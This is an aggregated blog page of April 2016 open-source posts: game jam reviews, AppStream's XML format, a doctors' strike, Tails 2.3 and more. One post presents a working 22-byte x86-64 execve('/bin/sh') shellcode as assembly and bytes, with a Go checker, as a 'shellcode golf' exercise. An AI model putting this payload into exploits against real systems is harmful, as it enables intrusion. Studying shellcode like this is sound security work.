    Last week, I secretly reused my own LRU code in the model of the editor of a CNC machine (it has truly huge files and needs a statement editor). I rewrote my own code, of course. It's Qt based, not GLib, and wouldn't work in its original form anyway. But it's the same principle. Don't tell Jürg, who helped me write it back then.

    Extra points and free beer for people who can find it in Tracker’s code.


    27 April, 2016 10:55AM by Philip Van Hoof (pvanhoof@gnome.org)

    hackergotchi for Ubuntu developers

    Ubuntu developers

    David Tomaschik: Even shorter x86-64 shellcode

    So about two years ago, I put together the shortest x86-64 shellcode for execve("/bin/sh",...); that I could. At the time, it was 25 bytes, which I thought was pretty damn good. However, I’m a perfectionist and so I spent some time before work this morning playing shellcode golf. The rules of my shellcode golf are pretty simple:

    • The shellcode must produce the desired effect.
    • It doesn’t have to do things cleanly (i.e., segfaulting after is OK, as is using APIs in unusual ways, so long as it works)
    • It can assume the stack pointer is at a place where it will not segfault and it will not overwrite the shellcode itself.
    • No NULLs. While there might be other constraints, this one is too common to not have as a default.

    So, spending a little bit of time on this, I came up with the following 22 byte shellcode:

    BITS 64
    
    xor esi, esi
    push rsi
    mov rbx, 0x68732f2f6e69622f
    push rbx
    push rsp
    pop rdi
    imul esi
    mov al, 0x3b
    syscall
    

    Assembled, we get:

    char shellcode[] = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05";
    

    This is shorter than anything I could find on shell-storm or other shellcode repositories. If you know of something shorter or think you can do better, let me know!
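    If you want to double-check the constraints mechanically rather than by eye, a tiny throwaway program can confirm the length and the absence of NULL bytes. This is just a sketch (mine happens to be in Go) and not part of the original write-up:

    package main

    import "fmt"

    func main() {
    	shellcode := []byte("\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05")

    	fmt.Printf("length: %d bytes\n", len(shellcode)) // expect 22
    	for i, b := range shellcode {
    		if b == 0x00 {
    			fmt.Printf("NULL byte at offset %d\n", i)
    		}
    	}
    }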

    27 April, 2016 07:00AM

    April 26, 2016

    Stuart Langridge: LOWREZJAM reviews

    A few weeks ago, the LOWREZJAM kicked off on itch.io. It’s a game jam; the idea is to build a computer game. This one had an interesting restriction: the game had to be 64x64 pixels. So, we’re going old-school.

    I thought I’d enter. So did about four hundred other people. It turns out that a jolly good way to get people to rate your game is for you to rate theirs and comment on it; then, your comment gets decorated with a link saying “see their submission” and they tend to follow it and rate you in turn. So, I wrote a bunch of short reviews. There doesn’t seem to be a way to link to all my reviews in a given jam on itch.io (although it would be good if there were!), so I’ve collected them here for posterity. Note that these make no attempt to be comprehensive or fair or balanced; they’re basically comments on what I thought of the games I played and why I didn’t like them, if indeed I didn’t.

    A few games got a rating but not a comment; those aren’t included. I also haven’t included the actual ratings I gave, because those don’t matter as much. The comments are mainly designed to be helpful to the game’s developer, if anything.

    I only played in-browser games, because they’re easiest to play, and I don’t have the Unity web player so those games which require it didn’t get played. It’s good to see that a pretty high proportion of “Unity” games are using the Unity WebGL export so they can be played without the plugin! I also didn’t play everything; with 188 games just in-browser, I was never going to get through them all. Pro-tip: this is one good reason to give your game nice imagery, so it looks interesting in a big list.

    In essence, this was a lot of fun. There were an awful lot of things which were clearly only part-finished (didn’t have sound, didn’t have a way to win, didn’t have title screens, and so on), but there were some really accomplished entries in here; things that I can absolutely imagine being a released game that one could play and have fun with. Nice work, indie game dev community.

    You can also watch Jupiter Hadley play all the games on her YouTube channel; at time of writing mine isn’t done yet, but it should be over the next few days.

    So! Reviews!


    MatchMerchant

    The extra challenge provided by trying to match 4 (to get a potion) while not matching 3 (so the things disappear) adds an interesting extra wrinkle to this. The scene — a potion seller, wizards — adds some meaning to the game mechanic, and the graphics are good. Dragging is a little awkward, and unlike most match-3 games you can drag to swap any two pieces, which I didn’t at first realise.


    Time Scale

    I appreciate the idea of slowing down time. But I’m not sure why I wouldn’t play just with my finger on the shift key the whole entire time, thus turning the game into Bullet Time All The Time? Some puzzles which require performing them with time at normal speed would be nice, although maybe there are plenty and I just didn’t get that far….

    (also, the sound made by the “fire dots into the air” triangles is not perfectly synchronised with actually firing dots into the air, which makes jumping over them considerably harder; this may have been a deliberate thing, but it’s over the line between “maliciously confusing” and “just annoying”, for me at least)


    r

    Ouch, the ponderous music is quite painful to endure.


    Kulten

    Great graphics — the text is a little hard to read at times, especially distinguishing D and O, or similar — but the feel of the game is marvellous. It really misses sound!


    micro-society

    Interesting concept, although the 64px limitation maybe makes the representation a bit too abstract! Having new children get born just by walking into other players feels a bit weird, too. But there are some quite complex game mechanics underlying this!


    Star Shield

    Obviously simple graphics, but easy to play. The white UFOs are terribly hard to kill! I’m not sure what “shield” does; it certainly doesn’t stop you being killed by bullets or collisions :-)


    Castle Storm

    Really nicely put together; a complete and well-implemented fun game. The font is, as noted, a little hard to read, and it’s sometimes hard to know why you’re not allowed to buy a thing — is it because you haven’t bought one of the pre-requisites, or because you don’t have enough money, or because you’ve bought it already — and that does break the immersion somewhat. Watching a Lord attacking the enemy castle is highly amusing. Nice work!


    Fast Escape LowRez

    Maze gameplay boiled down to its simplest possible form. :) Agreed with bonus1up that some framing device and music and sounds would help it feel more like a game rather than a demo of the technique. The maze generator seems to generate some pretty tangled messes at times, and I roamed pretty aimlessly until I discovered the green exit block. A score or some method of assessing progress would be nice, perhaps.


    Gummy Turbo Tunnel

    I see the idea, but I assume that the deadline landed before gameplay could be added. Nice start on an idea, though!


    FRST FIRE

    Sadly, the game crashed with an error (screenshot at imgur) when I tried to increase the growth rate; I think I may have pressed “right” and Z at the same time. I love the concept; it would be nice to see a version of this which wasn’t constrained to 64x64 and the Pico, as an art piece and less clunky to fiddle with the parameters!


    Dungeon Shifter

    Interesting concept, and the graphics are nice (blocky, but nice). I don’t think I understood what most of the “control panel” is actually for, though, and needing to control that by clicking while simultaneously either clicking arrows or using the arrow keys to go up and down means that the challenge is not “playing the game” but “managing the controls”, which I don’t think is meant to be the challenging part :)


    64s Resistance

    I don’t think I understand what the score is actually scoring, here. Button-mashing, once I started being “attacked” from all sides, got me up to 70 or so, but I didn’t really have much of an idea what I was doing, and then my score reset to 0 and I didn’t know what I’d done wrong. It feels like there might be a good idea in here for twitch gameplayers and people who like Super Hexagon, but I think more feedback as to what’s going on and why is needed.


    LZRS

    The try-and-die-iest of try-and-die games :) Fun! The controls feel a little bit wonky; sometimes I wouldn’t be able to jump and it wasn’t clear why. Fun, though, and I won after only forty (!) deaths.


    Ghost

    Seems fun — it’s a tiny 64x64 Gunpoint, sorta! Really short, though; maybe more levels would be good.


    Duck Quest

    As you say, an in-progress demo rather than a complete game, but what’s there is pretty good. I like the single-colour palette; I can imagine this being a working game (once completed) on something like a watch or a single-use handheld game.


    Marble Incline Redux

    I don’t think the text display fits the 64px grid, does it? Also, it would be useful if continuing to the next level and starting that level were controlled with a keypress you’re already using, such as up arrow, as well as restarting after death, rather than having to wait or press R.


    Wall Defender

    Simple, and basic graphics, but easy to play and understand, and the two offset guns provide a modicum of strategy when trying to shoot two different attackers at once. I won first time out, so the difficulty curve probably needs a bit of tweaking :)


    The Forest

    Smooth movement, and I like that running into a shadow is not an instakill. Attempting to find the key is very frustrating!


    In’Out

    Elegantly done graphics. I didn’t realise for quite some time that you can jump :) Sound effects would be good to go along with the music, perhaps?


    Hyper Racing

    The car handles excellently — the first level is so easy to pass that I was already thinking of recommending more realistic movement (rather than being able to turn instantly), and then the second level (which is just the same idea, with a larger oval) is much much harder to pass in the time! So I think the difficulty curve is just about right, and the graphics are good; nice work!


    Memoblox

    The skull and its laugh makes me laugh in turn. I didn’t really realise that I was supposed to be remembering the colours until after the first playthrough; maybe some minimal instructions, or a slide saying “REMEMBER” before the colours start?


    Postal Panic

    Oh goodness me the voice commentary is so annoying. My game went out of its way to mock failure and have annoying voices and it’s not a patch on this; I kept missing parcels because I wanted to punch the screen. Excellently done. Also, nice graphics, good sound work, and slick; a complete game. Only a weakling such as myself would rate it down because it’s just too hard :)


    Monty Norman’s James Bond Theme

    I didn’t realise that I was meant to shoot without being able to see Bond! Once I worked that out, and that the “gunsight” was actually moving even though it doesn’t appear to be because the background is all white, I was able to shoot at and hit 007. I like the music loudness approach (reminiscent of Find the Invisible Cow).


    Sk8Skull

    A good start; nice pixel art. The game obviously needs work, as you know; as far as I can tell it’s not possible to jump over two sets of spikes next to one another. You’ll also not want to make the “restart the game” keypress also count as a “jump” keypress. But this could grow to be something good with more work!


    Terracell

    I suspect this is a demo that never got finished? The graphics are surprisingly impressive — I particularly liked the realism of the rain — but there doesn’t seem to be a purpose to the game (nor any sound), and walking through an elephant means that the elephant sticks right with you and flickers on and off, weirdly. Could be the nucleus of something impressive with lots more development, though; a good start.


    The Sheriff

    Sadly, the game doesn’t cancel keypresses when they’re not used, which means that every time I’m walking downwards and I walk into something, the down arrow is ignored by the game and passes on to the web page and the page scrolls downwards, taking the game out of vision! This made it really hard to play, I’m afraid! Opening the frame in its own tab helps, though.


    BuggyBall

    Nice art, and the car is surprisingly controllable. The low resolution meant that I didn’t realise for quite a while that my car could be turned upside down and that’s why I couldn’t drive anywhere, though, and if you leave the AI alone for three seconds it scores a goal :-)


    Useless Clicker

    Impeccably implemented simple joke. It gets a smirk, which I’m sure is all its little heart desires :)


    Mogee

    I think I got trapped in a corner and couldn’t get out, even after I died and the game restarted. Simple mechanic, and it’d benefit from some sound, but playable!


    Cat Herder 9000

    The cats slide around not on the 64x64 grid, which makes them look smooth but breaks the rules :) As noted, there’s not much of a sense of agency here; I don’t feel like I have much control over the cats (arguably, because they’re cats), but that does mean that the game feels like making a succession of random moves until you win by accident, rather than by superior play. I can’t see how anyone could become an expert at this game rather than merely winning by luck…


    Circle Pong

    Quite a clever mechanic — that I get confused when I’m atop the circle and the “left” button is actually going to the right is not the game’s fault :) It’s very easy to overshoot or undershoot, though, which is frustrating; it might be nice if this were made less punishing, although maybe the idea of having to get it dead on right is a deliberate part of gameplay!


    Intents: Man to Man (v1.01a)

    The description calls this “weird”, which I don’t think is fair, but it is detailed. As noted, paying attention to the manual is pretty important to work out what’s going on. Choosing the squares to move to feels unusually clumsy, by comparison with the rest of the UI which actually flows pretty well once you’ve got the hang of what you’re doing. This feels like the video equivalent of what “proper” wargames (measure the hexes, spend time with books of tables calculating precise angles and damage for mortars, etc) are to Risk, and there’s definitely an audience for that.

    (also, as @phantomax says… it’s not meant to be called “intense”, is it? :))


    Cat’s Trophy!

    Cute but rather bare graphics. The game’s actually surprisingly hard. Instadeath for going off screen seems a bit harsh, rather than just locking the player to the screen.


    Dexno

    I found it useful to apply a changed style to the canvas in the game: canvas { height: 60vh; } makes it much bigger and easier to see, which may help with the issue you were having with the HTML viewport.


    SQUARE SQUARE

    Interesting idea. It’s really, really difficult though; maybe start slower and speed up over time? Otherwise it leads less to attempts to do better and more to just table-flipping annoyance and a move on to another game :)


    Mini Prix

    Ninth out of nine, but this was good fun!


    Zerwol the Wizard

    I don’t have any very clear idea of what I’m meant to do — just wander around and kill everything?


    FusionSpace

    The music kept making me think it was going to be the Game of Thrones theme :)


    Of A Forgotten Earth

    Hard to see what’s going on when most of the screen is obscured (although maybe that’s the point). The cutscene at the beginning is interesting the first time through the game but has to be manually skipped through every time you die, which is rather frustrating.


    Air War 64x64

    Looks really good! but it’s sometimes hard to see exactly where the Red Baron is when he’s just three or four red pixels :) Also, it’s a little hard to tell whether I won or lost when we end up flying directly at one another firing. (Perhaps it’s just that I’ve never won and so I’ve never seen a win screen!)


    Cave 64

    Basic graphics, but has potential to be developed into something!


    Battle Box (LowRezJam)

    I’m not sure I wholly understand what I’m doing, here. I can roll around, shoot white blocks (which moves them), and shoot the enemy (which moves them but doesn’t kill them, to my surprise), but… then what? I like the conceit of the rolling cube which fires in a particular direction, much like a bunch of single-player puzzles of this kind. The time limit on a move makes it all feel rather rushed, which is a little unfortunate because it makes the game feel like a very low rez arena deathmatch, rather than like a carefully thought-out chess game.


    Endless Burger

    I wish there were some sound in this. That the merest touch of a burger bap on my mostly-complete burger counts as instadeath means that I end up playing the game by merely fleeing from burger tops like a gluten-free lunatic with a flour phobia, but that's perhaps part of the skill of the game. But without sound, it feels half-finished. This wouldn't take much to be turned into a really challenging game, I think!


    GhostShi

    Sadly, the “up” and “down” abilities didn’t seem to work for me, so all I could seem to do is walk off the edge into the first water pool and die. Maybe there’s something I missed, but a little tutorial level might have helped if there’s an action I didn’t know to do. Nice graphics and feel.


    Total Devotion

    This is alarmingly creepy. It also shamelessly violates the 64x64 pixel grid :)


    Forms II : Hero Of the Office

    An interesting concept. After the first day, the screen went red and I didn’t seem to be able to do anything else, sadly. I like the graphical approach and the idea behind it, though!


    Gravimine

    Took me some time to realise that collisions with (a) the rocks you’re trying to mine and (b) the bottom of the tractor beam (?) are fatal and I’m supposed to avoid that. Once I’d got it, there is potential here; it’s Thrust, but with the added attraction that the rock follows you around and you mustn’t collide with it. Obviously it’s just a prototype and therefore doesn’t have music or backstory or anything, but I think this could be quite entertaining once it becomes a game!


    Big Sword

    Nice feel, especially the squelch on hitting something. It does lend itself a bit to button mashing, but that’s part of the old-school fun :)


    babelburger

    I don’t think I’d eat a burger which had a burger bun, a slice of lettuce, another slice of lettuce, and two more burger buns. Might be a bit bland :) That aside, the game takes real advantage of its low resolution and is rather fun! The logo’s delightful, too. It’s a little hard in initial play, perhaps; softening the difficulty curve just a tiny bit might be useful, so people can get beyond about two burgers without having to be the Flash. I suspect this might be easier with a touchscreen…


    Bring Your Wedge

    Yay! 64 points! I still don’t think I’ve quite grasped what the perfect tempo is, but I like the game a lot; quite a compelling challenge, and getting a hole in one is lovely :)


    Snakoban

    Surprisingly difficult for such a simple game mechanic! It would be worth cancelling the keypresses after you’ve trapped them, so that up/down arrows don’t navigate up and down the page.


    Looping Zip

    Simple gameplay and easy to grasp, but rather hard to master! It may be worth prohibiting space bar presses from changing direction if they’re pressed after the game has “started” but before the ship has actually started moving, because a few times I hit space to start when I thought my previous press hadn’t been registered, only to discover that it had been registered but the ship is slow to get started.


    QWER

    Needs, I think, a little tutorial bit or similar to explain the mechanics? I managed to have two of my shapes completely disappear but I don’t know whether that was a good thing or a bad…


    A Leader

    Hard to work out what to do to pick up people and avoid losing them; it feels like this might be a good twitch game, or a good puzzle game, but trying to solve the puzzle of how to bypass each impediment and pick up each person while also trying to manage the twitch element of doing it all at the right time is overwhelming my poor brain…


    Lament

    The controls are… a bit difficult to get one’s head around, but once mastered they’re OK. That you can’t stop on a wall (you can either climb or slide, but not stay still) is a touch weird, but getting to grips with that is the required skill, perhaps. The music is a cool track but maybe a bit overdramatic for the actual gameplay. This is the kernel of a good idea, I think; could be good with work.


    1985

    Nicely done. Feels very old-school, in a good way; I can absolutely imagine this being a released game back in the day.


    bitbout

    Was driven nuts by the lack of friction on the platforms, at which I’m sure the author was cackling and rubbing their hands in glee because that’s the point. Having a computer enemy would be good for practice, although I fell off enough all by myself…


    PRTs

    Delightful graphics; the limited palette really helps! Sailing around does feel a bit aimless, especially since I don’t seem to be able to re-visit an island where I died (does it sink back into the sea when the crabs make a kill or something?). Once I’d worked out that the combat relied on me hitting the arrow keys in time with those on screen rather than just as fast as possible, I never lost another battle, so that was nice :)


    Dual Wielded

    Flinging myself around by firing guns is interesting; reminds me of the XKCD What If article about flying by building a platform of AK-47s! Nice low-res graphics, too, and choice of protagonist.


    H4LF L1F3

    Nice effects on the title screen. Game seems smooth but occasionally the framerate drops. I killed a monster but then wasn’t sure what to do; shooting the “cells” seems to make them react, but they don’t die, and shooting the big “cell” in the middle makes the screen flash and we get a “gasp!” sound effect but that doesn’t die either.


    The Legend of Fangury

    Classic, indeed, but well implemented. I particularly appreciate that inadvertently touching an enemy is not instadeath! I do occasionally find myself leaping a bit into the unknown because it’s hard to see what’s coming up, but perhaps that’s a feature rather than a bug.


    Swarm

    I think this is hurt by the 64x64 limitation; it feels like I’m frantically moving my tiny letterbox around the map searching for a flower under attack as pointed to by the indicators. Of course, that’s part of the game, but it’s probably a bit far over the frustrating-vs-fun line for me. I also spent almost the whole first playthrough thinking that the little darker green “grass” things were flowers and failing to understand why nothing worked :) The swarming effect is really nice!


    OR-BIT

    Avoiding things is really, really hard. Not, like, “I must get expertise” hard, but “solid wall of unavoidable rocks” hard. I like the slightly drifty slow uncontrollable nature of the astronaut, which fits with the low-gravity backstory, but combining that with the sheer volume of rocks makes survival pretty much impossible…


    Potion Guesser

    It’s very hard to know which ingredient is currently selected, and it’s possible to select the “right arrow” even when you’re at the end of the list, meaning that I spent half the time baffled that mouse clicks weren’t doing anything. Other than that, the UI seems quite smooth and nice. The game’s a lot harder because you can’t use the same ingredient twice! I expected the “troll’s eye” to do something special because I was especially given it in the opening cutscene, but maybe that’s just misinterpretation.


    Pixel Eater

    Obviously very minimal in graphics (and no sound at all), but the idea is reasonable. Interestingly, I expected red berries to be an instakill and was pleased to see that they drop you a size category instead. The game is very easy, though; I won on the second and all subsequent tries :-)


    BNOD

    Agreed with other comments; I don’t get the rules. I don’t see what FRIENDS? or SPACE actually mean. Possibly the whole game is to work that out, but the hurdle makes me turn away rather than puzzle to figure it out :(


    Oort

    (no sound, though?) Obviously unfinished, as mentioned in the description. That said, I like that the jumps are absurdly high by comparison with other platforms (and in addition to this absurdly high jump we have a double jump which is doubly absurdly high); it changes the way I think about the game a surprising amount for such a nominally small change. Being followed about by the nasty things with red eyes and being unable to shake them off is also an interesting mechanic, and I like their hammers. As noted, the space-to-“attack” thing doesn't actually do anything other than draw a dotted circle around me and freeze the game, so I suspect that's not yet implemented. But there's the core of a good thing here; interesting graphics, interesting divergence from standard platforming rules with the high jump, and I'd like to see more.

    And the game I thought was best…

    Slumber Knight

    Great fun game; graphics are well done, sound matched, good feel to the game. Nice one! Full marks.

    I really liked Slumber Knight. Delightful graphics and feel. I confessed to the developer on Twitter that I ended up hacking the game a bit so I could see how it ended, by making myself immune to collisions, but that’s not a bad thing about the game, it’s a bad thing about my impatience. It’s excellent work.

    And… what I did

    I did, of course, enter a game myself. It's called “Have You Seen This Image?”, and you can play it. It was deliberately simple — I didn't want to devote much time to writing it — but I really enjoyed the experience of building a complete game, releasing it, and seeing people rate it. A pretty common theme in the comments was that it doesn't _quite_ explain exactly what you need to do, but I think everybody gets it after one playthrough, and playthroughs are very quick indeed. (I put some effort into making sure that you can start again without having to wait as soon as you die.) The juxtaposition of the abusive failure messages with the marvellously jaunty music still makes me laugh every time I play it. (The music is Pixelland from the incomparable Kevin MacLeod.)

    Images were from Wikipedia; after some help from the #wikimedia-tech IRC channel, I discovered Quarry, which allows you to run arbitrary SQL queries against the Wikimedia databases from inside the browser, and is a very excellent thing indeed. So I wrote a query to return all 64x64 images from Wikimedia Commons and then picked a bunch of them. In order to make the game more difficult, I then made three copies of each image, tinted blue, red, and green respectively, so you'd see images that you might have seen before but in different colours. And that was that. There's a bug in there somewhere which causes two success sounds to play at once (so you get the game saying “Awesome!” _and_ “Fantastic!” when you get it right sometimes), but after trying and failing to work out why, I've reclassified it as a feature because it amuses me to hear the sounds anyway.

    So, conclusion: writing a game is fun; hanging out with the game jam community is fun; thank you to popey for nudging me into doing it; and I came 72nd for game feel, which I am perfectly happy with. Must do this again at some point.

    26 April, 2016 05:12PM

    hackergotchi for Tanglu developers

    Tanglu developers

    Why are AppStream metainfo files XML data?

    This is a question raised quite often, the last time in a blog post by Thomas, so I thought it is a good idea to give a slightly longer explanation (and also to create an article to link to…).

    There are basically three reasons for using XML as the default format for metainfo files:

    1. XML is easily forward/backward compatible, while YAML is not

    This is a matter of extending the AppStream metainfo files with new entries, or adapting existing entries to new needs.

    Take this example XML line for defining an icon for an application:

    <icon type="cached">foobar.png</icon>

    and now the equivalent YAML:

    Icons:
      cached: foobar.png

    Now consider we want to add a width and height property to the icons, because we started to allow more than one icon size. Easy for the XML:

    <icon type="cached" width="128" height="128">foobar.png</icon>

    This line of XML can be read correctly by both old parsers, which will just see the icon as before without reading the size information, and new parsers, which can make use of the additional information if they want. The change is both forward and backward compatible.

    This looks different with the YAML file. The “foobar.png” is a string type, and parsers will expect a string as the value for the cached key, while we would need a dictionary there to include the additional width/height information:

    Icons:
      cached:
        name: foobar.png
        width: 128
        height: 128

    The change shown above will break existing parsers though. Of course, we could add a cached2 key, but that would require people to write two entries, to keep compatibility with older parsers:

    Icons:
      cached: foobar.png
      cached2:
        name: foobar.png
        width: 128
        height: 128

    Less than ideal.

    While there are ways to break compatibility in XML documents too, as well as ways to design YAML documents in a way which minimizes the risk of breaking compatibility later, keeping the format future-proof is far easier with XML than with YAML (and is sometimes simply not possible with YAML documents). This makes XML a good choice for this use case, since we cannot easily do transitions with thousands of independent upstream projects, and need to care about backwards compatibility.
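    As a small illustration of that point, the sketch below (written in Go with encoding/xml purely for demonstration, not how AppStream parsers are actually implemented) shows an “old” parser that only knows about the original attributes happily ignoring the new ones, while a “new” parser picks them up:

    package main

    import (
    	"encoding/xml"
    	"fmt"
    )

    // iconV1 models what an "old" parser knows about: the type and the file name.
    type iconV1 struct {
    	Type string `xml:"type,attr"`
    	Name string `xml:",chardata"`
    }

    // iconV2 models a "new" parser that also understands width and height.
    type iconV2 struct {
    	Type   string `xml:"type,attr"`
    	Width  int    `xml:"width,attr"`
    	Height int    `xml:"height,attr"`
    	Name   string `xml:",chardata"`
    }

    func main() {
    	data := []byte(`<icon type="cached" width="128" height="128">foobar.png</icon>`)

    	var older iconV1
    	var newer iconV2
    	// Unknown attributes are simply ignored, so the old parser keeps working.
    	if err := xml.Unmarshal(data, &older); err != nil {
    		panic(err)
    	}
    	if err := xml.Unmarshal(data, &newer); err != nil {
    		panic(err)
    	}

    	fmt.Printf("old parser: %+v\n", older)
    	fmt.Printf("new parser: %+v\n", newer)
    }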

    2. Translating YAML is not much fun

    A property of AppStream metainfo files is that they can be easily translated into multiple languages. For that, tools like intltool and itstool exist to aid with translating XML using Gettext files. This can be done at project build-time, keeping a clean, minimal XML file, or before, storing the translated strings directly in the XML document. Generally, YAML files can be translated too. Take the following example (shamelessly copied from Dolphin):

    <summary>File Manager</summary>
    <summary xml:lang="bs">Upravitelj datoteka</summary>
    <summary xml:lang="cs">Správce souborů</summary>
    <summary xml:lang="da">Filhåndtering</summary>

    This would become something like this in YAML:

    Summary:
      C: File Manager
      bs: Upravitelj datoteka
      cs: Správce souborů
      da: Filhåndtering

    Looks manageable, right? Now, AppStream also covers long descriptions, where individual paragraphs can be translated by the translators. This looks like this in XML:

    <description>
      <p>Dolphin is a lightweight file manager. It has been designed with ease of use and simplicity in mind, while still allowing flexibility and customisation. This means that you can do your file management exactly the way you want to do it.</p>
      <p xml:lang="de">Dolphin ist ein schlankes Programm zur Dateiverwaltung. Es wurde mit dem Ziel entwickelt, einfach in der Anwendung, dabei aber auch flexibel und anpassungsfähig zu sein. Sie können daher Ihre Dateiverwaltungsaufgaben genau nach Ihren Bedürfnissen ausführen.</p>
      <p>Features:</p>
      <p xml:lang="de">Funktionen:</p>
      <p xml:lang="es">Características:</p>
      <ul>
        <li>Navigation (or breadcrumb) bar for URLs, allowing you to quickly navigate through the hierarchy of files and folders.</li>
        <li xml:lang="de">Navigationsleiste für Adressen (auch editierbar), mit der Sie schnell durch die Hierarchie der Dateien und Ordner navigieren können.</li>
        <li xml:lang="es">barra de navegación (o de ruta completa) para URL que permite navegar rápidamente a través de la jerarquía de archivos y carpetas.</li>
        <li>Supports several different kinds of view styles and properties and allows you to configure the view exactly how you want it.</li>
        ....
      </ul>
    </description>

    Now, how would you represent this in YAML? Since we need to preserve the paragraph and enumeration markup somehow, and creating a large chain of YAML dictionaries is not really a sane option, the only choices would be:

    • Embed the HTML markup in the file, and risk non-careful translators breaking the markup by e.g. not closing tags.
    • Use Markdown, and risk people not writing the markup correctly when translating a really long string in Gettext.

    In both cases, we would lose the ability to translate individual paragraphs, which also means that as soon as the developer changes the original text in YAML, translators would need to translate the whole bunch again, which is inconvenient.

    On top of that, there are no tools to translate YAML properly that I am aware of, so we would need to write those too.

    3. Allowing XML and YAML makes a confusing story and adds complexity

    While adding YAML as a format would not be too hard, given that we already support it for DEP-11 distro metadata (Debian uses this), it would make the business of creating metainfo files more confusing. At the moment, we have a clear story: write the XML, store it in /usr/share/metainfo, use standard tools to translate the translatable entries. Adding YAML to the mix adds an additional choice that needs to be supported for eternity and also has the problems mentioned above.

I wanted to add YAML as a format for AppStream, and we discussed this at the hackfest as well, but in the end I think it isn’t worth the pain of supporting it for upstream projects (remember, someone needs to maintain the parsers and specification too, and keep XML and YAML in sync and updated). Don’t get me wrong, I love YAML, but for translated metadata which needs a guarantee of format stability it is not the ideal choice.

    So yeah, XML isn’t fun to write by hand. But for this case, XML is a good choice.

    26 April, 2016 04:20PM by Matthias

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu Insights: Samsung Developer Conference 2016


It’s arrived! Samsung’s big yearly developer event runs from April 27th to 28th in San Francisco. It’s a place where developers, creators and builders alike come together to discuss the latest technologies and future innovations.

This year, IoT will be one of the big focuses, especially around the smart home and ARTIK, Samsung’s new chipset for IoT. We’ll be there presenting via our developer evangelist, Didier, who’ll be showcasing a demo, and our work will also get a mention from ARTIK’s head of division in his talk.

    Our demo will be an app enabled home gateway on which we can deploy several applications. We’ll show you how your smart home could interact with a home robot to serve you. The robot will use the camera you have in the house to recognise that you’ve arrived, then use a microphone in the house to take orders from you (!)

There are other apps that can be deployed on the home gateway too, including an access point (home wifi), a video service, a local communication server (imagine a Skype or Google Hangouts call where the data stays in your home) and home automation, to name a few.

    In the build-up to the event we’ve written a few pre-event blogs on their website, including this one here!

    26 April, 2016 03:45PM

    Oli Warner: Our doctors are striking for patients, not money

My better half is a junior doctor. She works insanely long hours and cares completely for her patients. When you can see how much it costs somebody as conscientious as she is to walk out on strike, it's all the more frustrating that press coverage is so spotty, confusing and often insulting.

    The underlying issue is so simple: There aren't enough doctors.

    Ignore everything you've been told. The situation in the NHS is simple to explain:

    • Doctors are a finite resource. We have 55,000 doctors in training in the NHS in England.
• These 55,000 only barely cover the existing shifts: full regular service, 9-5ish, Monday to Friday, plus 24/7 emergency care. In many smaller hospitals there are already dangerous rota gaps from understaffing, but they just scrape by.

    The contract being imposed in August —the one doctors are striking against— was designed to make it affordable and legally possible for hospitals to spread these 55,000 doctors from 5 days full service, to 7 days full service.

    You can't safely do 7 days work with 5 days people.

    The Government's maths to make this "work": you take some doctors from midweek and move them to the weekend. That's what this contract allows, one way or the other. Fewer doctors in the week, and dangerously long shifts to cover the existing workload with fewer concurrent staff.

    And that isn't safe. The level of cover in some places is already dangerous. You can't spread doctors any thinner and expect anything but a diminished service. The NHS needs more doctors, not the same number spread over more days. And that's the only thing you need to consider when you're wondering why doctors are striking and whose fault that is.


    That's not to say that there aren't also other issues here. There are and they are significant but all of that can be boiled into the same argument. The NHS is already haemorrhaging doctors to countries with better working conditions and the cost to become a doctor here is huge. While we need the number of 55,000 junior doctors to grow substantially, everything about this contract and the treatment of existing doctors up to now will mean it likely shrinks away.

I don't want to conflate the issue. Your doctors aren't striking over a 30% pay cut or the additional weekends they'll be pulled in for; they're striking because they're being told that starting in August they will be doing an unsafe amount of work with an unsafe number of doctors. The rest is just distracting gravy.

    This contract is dangerous to patients, present and future. It must be resisted.

    26 April, 2016 03:18PM

    Forums Council: Forum Staff Additions

    A healthy team is able to renew itself and integrate new members. It is always a refreshing and exciting process, to look for new people to add to a team.

    The following Ubuntu Forums users have accepted to be part of the Staff team, which now consists of 21 Moderators, 3 Super-Moderators and 5 Admins. In addition, 4 forums users have Moderator status in a specific sub-forum (UWN, Catalan and Argentina LoCo teams forums we host). You can find a complete list of the forums leaders here.

The new Forums Moderators are:

    Congratulations from the Ubuntu Forums Council.


    26 April, 2016 03:02PM

    Rhonda D'Vine: Prince

Last week we lost another great musician, songwriter, artist. It's painful to realise that more and more of the people you grew up with aren't there anymore. We lost Prince, TAFKAP, Symbol, Prince. He wrote a lot of great music, even some you wouldn't attribute to him, like Sinead O'Connor's Nothing Compares To You, Bangles' Manic Monday or Chaka Khan's I Feel For You. But I would actually like to share some songs that he also performed himself, so without further ado, here are the songs:

    Rest in peace, Prince. And you, enjoy.


    26 April, 2016 12:32PM

    Canonical Design Team: Ubuntu orange update

    Recently, you may have seen our new colour palette update in the SDK. One notable change is the new hex code we’ve assigned to Ubuntu Orange for screen use. The new colour is #E95420.

    We have a post coming soon that will delve deeper into our new palette but for now we just wanted to make sure this change is reflected on our website while at the same time touching on it through our blog. Our Suru visual language has evolved to have a lighter feel and we’ve adjusted the hex value in order to fit in with the palette as a whole.

    We’ve updated our brand colour guidelines to take into account this change as well. You can find the new hex as well as all the tints of this colour that we recommend using in your design work.

    26 April, 2016 11:27AM

    hackergotchi for Tails

    Tails

    Tails 2.3 is out

    This release fixes many security issues and users should upgrade as soon as possible.

    Changes

    Upgrades and changes

    • You can now copy and paste your GnuPG passphrases into the pinentry dialog, for example from KeePassX or the clipboard.

    • Upgrade Tor Browser to 5.5.5.

    • Upgrade I2P to 0.9.25.

    • Upgrade Electrum from 2.5.4 to 2.6.3.

    Fixed problems

    • Clarify that users migrating from Claws Mail to Icedove should delete all their Claws Mail data to remove the warning when starting Icedove. (#11187)

    • Make both panes of Onion Circuits scrollable to fix display issues on smaller screens. (#11192)

    For more details, read our changelog.

    Known issues

    None specific to this release.

    See the list of long-standing issues.

    Get Tails 2.3

    What's coming up?

    Tails 2.4 is scheduled for June 7.

    Have a look at our roadmap to see where we are heading to.

We need your help and there are many ways to contribute to Tails (donating is only one of them). Come talk to us!

    26 April, 2016 10:34AM

    hackergotchi for Ubuntu developers

    Ubuntu developers

    Ubuntu Insights: The most powerful Ubuntu phone is available to buy


